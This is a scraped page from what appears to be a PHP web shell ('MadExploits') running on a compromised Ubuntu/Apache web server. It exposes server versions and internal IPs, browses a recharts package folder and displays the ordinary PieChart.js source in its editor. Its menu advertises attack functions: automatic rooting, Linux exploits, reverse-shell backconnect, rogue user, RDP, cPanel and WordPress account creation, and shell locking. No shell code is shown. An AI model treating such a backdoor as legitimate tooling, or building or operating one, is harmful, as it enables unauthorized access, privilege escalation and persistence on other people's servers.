Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
recharts /
es6 /
chart /
[ HOME SHELL ]
Name
Size
Permission
Action
AccessibilityManager.js
5.79
KB
-rw-r--r--
AreaChart.js
547
B
-rw-r--r--
BarChart.js
623
B
-rw-r--r--
ComposedChart.js
805
B
-rw-r--r--
FunnelChart.js
405
B
-rw-r--r--
LineChart.js
547
B
-rw-r--r--
PieChart.js
851
B
-rw-r--r--
RadarChart.js
762
B
-rw-r--r--
RadialBarChart.js
894
B
-rw-r--r--
Sankey.js
26.76
KB
-rw-r--r--
ScatterChart.js
733
B
-rw-r--r--
SunburstChart.js
9.06
KB
-rw-r--r--
Treemap.js
27.23
KB
-rw-r--r--
generateCategoricalChart.js
95.45
KB
-rw-r--r--
types.js
10
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PieChart.js
/** * @fileOverview Pie Chart */ import { generateCategoricalChart } from './generateCategoricalChart'; import { PolarAngleAxis } from '../polar/PolarAngleAxis'; import { PolarRadiusAxis } from '../polar/PolarRadiusAxis'; import { formatAxisMap } from '../util/PolarUtils'; import { Pie } from '../polar/Pie'; export var PieChart = generateCategoricalChart({ chartName: 'PieChart', GraphicalChild: Pie, validateTooltipEventTypes: ['item'], defaultTooltipEventType: 'item', legendContent: 'children', axisComponents: [{ axisType: 'angleAxis', AxisComp: PolarAngleAxis }, { axisType: 'radiusAxis', AxisComp: PolarRadiusAxis }], formatAxisMap: formatAxisMap, defaultProps: { layout: 'centric', startAngle: 0, endAngle: 360, cx: '50%', cy: '50%', innerRadius: 0, outerRadius: '80%' } });
Close